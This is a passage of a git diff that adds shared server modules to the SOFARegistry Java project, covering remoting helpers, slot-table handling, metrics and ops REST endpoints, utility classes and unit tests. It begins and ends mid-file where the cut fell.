@Override + public Class interest() { + return null; + } + + @Override + public HandlerType getType() { + return HandlerType.LISTENER; + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/RemotingHelper.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/RemotingHelper.java new file mode 100644 index 000000000..c4c78e601 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/RemotingHelper.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.sofa.registry.remoting.Channel; +import java.net.InetSocketAddress; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-14 11:39 yuzhi.lyz Exp $ + */ +public final class RemotingHelper { + private RemotingHelper() {} + + public static InetSocketAddress getChannelRemoteAddress(Channel channel) { + return channel == null ? null : channel.getRemoteAddress(); + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/ServerSideExchanger.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/ServerSideExchanger.java new file mode 100644 index 000000000..371336326 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/ServerSideExchanger.java @@ -0,0 +1,106 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Client; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; +import com.alipay.sofa.registry.remoting.exchange.RequestChannelClosedException; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.remoting.exchange.message.Request; +import com.alipay.sofa.registry.remoting.exchange.message.Response; +import com.alipay.sofa.registry.util.CollectionUtils; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-18 11:40 yuzhi.lyz Exp $ + */ +public abstract class ServerSideExchanger implements NodeExchanger { + private static final Logger LOGGER = LoggerFactory.getLogger(ServerSideExchanger.class); + + @Autowired protected Exchange boltExchange; + + @Override + public Response request(Request request) throws RequestException { + final URL url = request.getRequestUrl(); + if (url == null) { + throw new RequestException("null url", request); + } + return request(url, request); + } + + public Response request(URL url, Request request) throws RequestException { + if (LOGGER.isDebugEnabled()) { + LOGGER.debug( + "serverPort={} to client, url:{}, request body:{} ", + getServerPort(), + url, + request.getRequestBody()); + } + final Server server = boltExchange.getServer(getServerPort()); + if (server == null) { + throw new RequestException("no server for " + url + "," + getServerPort(), request); + } + final int timeout = request.getTimeout() != null ? request.getTimeout() : getRpcTimeoutMillis(); + Channel channel = null; + if (url == null) { + // now use in dsr console sync case + channel = chooseChannel(server); + } else { + channel = server.getChannel(url); + } + + if (channel == null || !channel.isConnected()) { + throw new RequestChannelClosedException( + getServerPort() + ", channel may be closed, " + url, request); + } + try { + if (request.getCallBackHandler() != null) { + server.sendCallback( + channel, request.getRequestBody(), request.getCallBackHandler(), timeout); + return () -> Response.ResultStatus.SUCCESSFUL; + } else { + final Object result = server.sendSync(channel, request.getRequestBody(), timeout); + return () -> result; + } + } catch (Throwable e) { + throw new RequestException( + getServerPort() + ", Exchanger request error! Request url:" + url, request, e); + } + } + + private Channel chooseChannel(Server server) { + List channels = server.getChannels(); + return CollectionUtils.getRandom(channels); + } + + @Override + public Client connectServer() { + throw new UnsupportedOperationException(); + } + + public abstract int getRpcTimeoutMillis(); + + public abstract int getServerPort(); +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/SlotTableChangeEventHandler.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/SlotTableChangeEventHandler.java new file mode 100644 index 000000000..6f99ec89f --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/SlotTableChangeEventHandler.java @@ -0,0 +1,77 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.SlotTableChangeEvent; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import java.util.concurrent.Executor; +import java.util.concurrent.ThreadPoolExecutor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Feb 24, 2021 + */ +public class SlotTableChangeEventHandler extends AbstractClientHandler { + + @Autowired MetaServerService metaServerService; + + @Autowired ThreadPoolExecutor metaNodeExecutor; + + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.META; + } + + @Override + public void checkParam(SlotTableChangeEvent request) { + ParaCheckUtil.checkNotNull(request, "SlotTableChangeEvent"); + super.checkParam(request); + ParaCheckUtil.checkIsPositive( + request.getSlotTableEpoch(), "SlotTableChangeEvent.slotTableEpoch"); + } + + @Override + public Object doHandle(Channel channel, SlotTableChangeEvent request) { + boolean result = metaServerService.handleSlotTableChange(request); + if (result) { + return CommonResponse.buildSuccessResponse("successfully triggered slot-table retrieval"); + } else { + return CommonResponse.buildFailedResponse( + "won't update slot-table, check [AbstractMetaServerService] log"); + } + } + + @Override + public Object buildFailedResponse(String msg) { + return CommonResponse.buildFailedResponse(msg); + } + + @Override + public Class interest() { + return SlotTableChangeEvent.class; + } + + @Override + public Executor getExecutor() { + return metaNodeExecutor; + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/resource/MetricsResource.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/resource/MetricsResource.java new file mode 100644 index 000000000..eba15a033 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/resource/MetricsResource.java @@ -0,0 +1,47 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.resource; + +import io.prometheus.client.CollectorRegistry; +import io.prometheus.client.exporter.common.TextFormat; +import java.io.OutputStreamWriter; +import java.io.Writer; +import javax.ws.rs.GET; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.Response; +import javax.ws.rs.core.StreamingOutput; + +@Path("metrics") +public class MetricsResource { + + @GET + @Produces(TextFormat.CONTENT_TYPE_004) + public Response metrics() { + return Response.ok() + .type(TextFormat.CONTENT_TYPE_004) + .entity( + (StreamingOutput) + output -> { + try (final Writer writer = new OutputStreamWriter(output)) { + TextFormat.write004( + writer, CollectorRegistry.defaultRegistry.metricFamilySamples()); + } + }) + .build(); + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/resource/RegistryOpsResource.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/resource/RegistryOpsResource.java new file mode 100644 index 000000000..f6cde7a98 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/resource/RegistryOpsResource.java @@ -0,0 +1,76 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.resource; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import javax.ws.rs.PUT; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Mar 18, 2021 + */ +@Path("opsapi/v1/") +public class RegistryOpsResource { + + private static final Logger LOGGER = LoggerFactory.getLogger(RegistryOpsResource.class); + + @Autowired MetaServerService metaServerService; + + @PUT + @Path("/server/group/quit") + @Produces(MediaType.APPLICATION_JSON) + public CommonResponse kickOffMyself() { + LOGGER.info("[kickOffMyself] begin"); + CommonResponse response = null; + try { + metaServerService.addSelfToMetaBlacklist(); + metaServerService.suspendRenewer(); + response = GenericResponse.buildSuccessResponse(); + } catch (Throwable th) { + LOGGER.error("[kickOffMyself]", th); + response = GenericResponse.buildFailedResponse(th.getMessage()); + } + LOGGER.info("[kickOffMyself] end, response: {}", response); + return response; + } + + @PUT + @Path("/server/group/join") + @Produces(MediaType.APPLICATION_JSON) + public CommonResponse putMyselfBack() { + LOGGER.info("[putMyselfBack] begin"); + CommonResponse response = null; + try { + metaServerService.resumeRenewer(); + metaServerService.removeSelfFromMetaBlacklist(); + response = GenericResponse.buildSuccessResponse(); + } catch (Throwable th) { + LOGGER.error("[putMyselfBack]", th); + response = GenericResponse.buildFailedResponse(th.getMessage()); + } + LOGGER.info("[putMyselfBack] end, response: {}", response); + return response; + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/resource/SlotGenericResource.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/resource/SlotGenericResource.java new file mode 100644 index 000000000..ef4c16e4b --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/resource/SlotGenericResource.java @@ -0,0 +1,55 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.resource; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.server.shared.slot.SlotTableRecorder; +import javax.ws.rs.GET; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; + +/** + * @author chen.zhu + *

Jan 12, 2021 + */ +@Path("openapi/v1/slot/table") +public class SlotGenericResource implements SlotTableRecorder { + + private volatile SlotTable slotTableRef = SlotTable.INIT; + + @GET + @Path("/content") + @Produces(MediaType.APPLICATION_JSON) + public GenericResponse slotTable() { + return new GenericResponse().fillSucceed(slotTableRef); + } + + @GET + @Path("/epoch") + @Produces(MediaType.APPLICATION_JSON) + public GenericResponse epoch() { + long epoch = slotTableRef.getEpoch(); + return new GenericResponse().fillSucceed(epoch); + } + + @Override + public void record(SlotTable slotTable) { + slotTableRef = slotTable; + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/slot/DiskSlotTableRecorder.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/slot/DiskSlotTableRecorder.java new file mode 100644 index 000000000..1ececca50 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/slot/DiskSlotTableRecorder.java @@ -0,0 +1,43 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.slot; + +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.JsonUtils; + +/** + * @author chen.zhu + *

Dec 25, 2020 + */ +public class DiskSlotTableRecorder implements SlotTableRecorder { + + private static final Logger logger = LoggerFactory.getLogger(DiskSlotTableRecorder.class); + + @Override + public void record(SlotTable slotTable) { + try { + String slotStr = JsonUtils.writeValueAsString(slotTable); + if (logger.isInfoEnabled()) { + logger.info("[record] record slot: {}", slotStr); + } + } catch (Exception e) { + logger.error("[record]", e); + } + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/slot/SlotTableRecorder.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/slot/SlotTableRecorder.java new file mode 100644 index 000000000..feedb6a30 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/slot/SlotTableRecorder.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.slot; + +import com.alipay.sofa.registry.common.model.slot.SlotTable; + +/** + * @author chen.zhu + *

Dec 25, 2020 + */ +public interface SlotTableRecorder { + + void record(SlotTable slotTable); +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/slot/SlotTableUtils.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/slot/SlotTableUtils.java new file mode 100644 index 000000000..f86738b20 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/slot/SlotTableUtils.java @@ -0,0 +1,101 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.slot; + +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.google.common.collect.Maps; +import java.util.Map; +import org.apache.commons.lang.StringUtils; + +/** + * @author chen.zhu + *

Jan 21, 2021 + */ +public class SlotTableUtils { + + private static final Logger logger = LoggerFactory.getLogger(SlotTableUtils.class); + + public static Map getSlotTableLeaderCount(SlotTable slotTable) { + Map leaderCounter = + Maps.newHashMapWithExpectedSize(slotTable.getSlots().size()); + for (Map.Entry entry : slotTable.getSlotMap().entrySet()) { + Slot slot = entry.getValue(); + incrCount(leaderCounter, slot.getLeader()); + } + return leaderCounter; + } + + public static Map getSlotTableFollowerCount(SlotTable slotTable) { + Map followerCounter = Maps.newHashMap(); + for (Slot slot : slotTable.getSlots()) { + for (String follower : slot.getFollowers()) { + incrCount(followerCounter, follower); + } + } + return followerCounter; + } + + public static Map getSlotTableSlotCount(SlotTable slotTable) { + Map slotCounter = Maps.newHashMapWithExpectedSize(slotTable.getSlots().size()); + for (Map.Entry entry : slotTable.getSlotMap().entrySet()) { + Slot slot = entry.getValue(); + incrCount(slotCounter, slot.getLeader()); + for (String follower : slot.getFollowers()) { + incrCount(slotCounter, follower); + } + } + return slotCounter; + } + + private static void incrCount(Map counter, String dataServer) { + Integer count = counter.get(dataServer); + if (count == null) { + count = 0; + } + counter.put(dataServer, count + 1); + } + + public static boolean isValidSlotTable(SlotTable slotTable) { + return checkNoDupLeaderAndFollowers(slotTable) && checkNoLeaderEmpty(slotTable); + } + + public static boolean checkNoDupLeaderAndFollowers(SlotTable slotTable) { + for (Map.Entry entry : slotTable.getSlotMap().entrySet()) { + Slot slot = entry.getValue(); + if (slot.getFollowers().contains(slot.getLeader())) { + logger.error( + "[checkNoDupLeaderAndFollowers] slot[{}] leader and follower duplicates", slot); + return false; + } + } + return true; + } + + public static boolean checkNoLeaderEmpty(SlotTable slotTable) { + for (Map.Entry entry : slotTable.getSlotMap().entrySet()) { + Slot slot = entry.getValue(); + if (StringUtils.isEmpty(slot.getLeader())) { + logger.error("[checkNoLeaderEmpty] slot[{}] empty leader", slot); + return false; + } + } + return true; + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/util/DatumUtils.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/util/DatumUtils.java new file mode 100644 index 000000000..375077ce6 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/util/DatumUtils.java @@ -0,0 +1,87 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.util; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.store.*; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.Collections; +import java.util.List; +import java.util.Map; + +/** + * @author xuanbei + * @since 2019/2/12 + */ +public final class DatumUtils { + private DatumUtils() {} + + public static Map intern(Map versionMap) { + Map ret = Maps.newHashMapWithExpectedSize(versionMap.size()); + versionMap.forEach((k, v) -> ret.put(WordCache.getWordCache(k), v)); + return ret; + } + + public static Map getVersions(Map datumMap) { + Map versions = Maps.newHashMapWithExpectedSize(datumMap.size()); + datumMap.forEach((k, v) -> versions.put(k, v.getVersion())); + return versions; + } + + public static SubDatum newEmptySubDatum(Subscriber subscriber, String datacenter) { + SubDatum datum = + new SubDatum( + subscriber.getDataInfoId(), + datacenter, + ValueConstants.DEFAULT_NO_DATUM_VERSION, + Collections.emptyList(), + subscriber.getDataId(), + subscriber.getInstanceId(), + subscriber.getGroup()); + return datum; + } + + public static SubDatum of(Datum datum) { + List publishers = Lists.newArrayListWithCapacity(datum.publisherSize()); + for (Publisher publisher : datum.getPubMap().values()) { + final URL srcAddress = publisher.getSourceAddress(); + // temp publisher the srcAddress maybe null + final String srcAddressString = srcAddress == null ? null : srcAddress.getAddressString(); + publishers.add( + new SubPublisher( + publisher.getRegisterId(), + publisher.getCell(), + publisher.getDataList(), + publisher.getClientId(), + publisher.getVersion(), + srcAddressString, + publisher.getRegisterTimestamp(), + publisher.getPublishSource())); + } + return new SubDatum( + datum.getDataInfoId(), + datum.getDataCenter(), + datum.getVersion(), + publishers, + datum.getDataId(), + datum.getInstanceId(), + datum.getGroup()); + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/util/NodeUtils.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/util/NodeUtils.java new file mode 100644 index 000000000..09d7a60d0 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/util/NodeUtils.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.util; + +import com.alipay.sofa.registry.common.model.Node; +import java.util.ArrayList; +import java.util.Collection; +import java.util.List; + +/** + * @author chen.zhu + *

Jan 12, 2021 + */ +public final class NodeUtils { + private NodeUtils() {} + + public static List transferNodeToIpList(Collection nodes) { + List result = new ArrayList<>(nodes.size()); + nodes.forEach(node -> result.add(node.getNodeUrl().getIpAddress())); + return result; + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/TestUtils.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/TestUtils.java new file mode 100644 index 000000000..40f21538c --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/TestUtils.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared; + +import org.junit.Assert; + +public class TestUtils { + + public static void assertRunException(Class eclazz, RunError runnable) { + try { + runnable.run(); + Assert.fail(); + } catch (Throwable exception) { + Assert.assertEquals(eclazz, exception.getClass()); + } + } + + public interface RunError { + void run() throws Exception; + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/comparator/ComparatorTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/comparator/ComparatorTest.java new file mode 100644 index 000000000..f629e6cac --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/comparator/ComparatorTest.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.comparator; + +import com.google.common.collect.Sets; +import java.util.Set; +import org.junit.Assert; +import org.junit.Test; + +public class ComparatorTest { + @Test + public void test() { + Set prev = Sets.newHashSet("1", "2"); + Set cur = Sets.newHashSet("2", "3"); + + NodeComparator comparator = new NodeComparator(prev, cur); + Assert.assertEquals(comparator.totalChange(), 2); + Assert.assertTrue(comparator.hasAnyChange()); + Assert.assertEquals(comparator.getAdded(), Sets.newHashSet("3")); + Assert.assertEquals(comparator.getRemoved(), Sets.newHashSet("1")); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/env/ServerEnvTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/env/ServerEnvTest.java new file mode 100644 index 000000000..fee66dde3 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/env/ServerEnvTest.java @@ -0,0 +1,48 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.env; + +import com.alipay.sofa.registry.server.shared.TestUtils; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import org.junit.Assert; +import org.junit.Test; + +import java.util.Collection; +import java.util.Collections; +import java.util.Map; +import java.util.Set; + +public class ServerEnvTest { + @Test + public void testMetas() { + Map> m = Maps.newHashMap(); + m.put("localDc", Collections.EMPTY_LIST); + TestUtils.assertRunException( + RuntimeException.class, () -> ServerEnv.getMetaAddresses(m, "localDc")); + Set meta = Sets.newHashSet("test"); + m.put("localDc", meta); + Collection ret = ServerEnv.getMetaAddresses(m, "localDc"); + Assert.assertEquals(ret, meta); + } + + @Test + public void testRelease() { + Map m = ServerEnv.getReleaseProps(); + System.out.println("release:" + m); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/meta/MetaServerManagerTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/meta/MetaServerManagerTest.java new file mode 100644 index 000000000..9a958fb2b --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/meta/MetaServerManagerTest.java @@ -0,0 +1,151 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.meta; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.elector.LeaderInfo; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.exception.MetaLeaderQueryException; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.jersey.JerseyClient; +import com.alipay.sofa.registry.server.shared.TestUtils; +import com.google.common.collect.Lists; +import java.util.*; +import javax.ws.rs.client.Invocation; +import javax.ws.rs.client.WebTarget; +import javax.ws.rs.core.Response; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class MetaServerManagerTest { + @Test + public void testLeader() { + javax.ws.rs.client.Client client = JerseyClient.getInstance().getClient(); + Assert.assertNull(AbstractMetaServerManager.queryLeaderInfo(Collections.EMPTY_LIST, client)); + Assert.assertNull( + 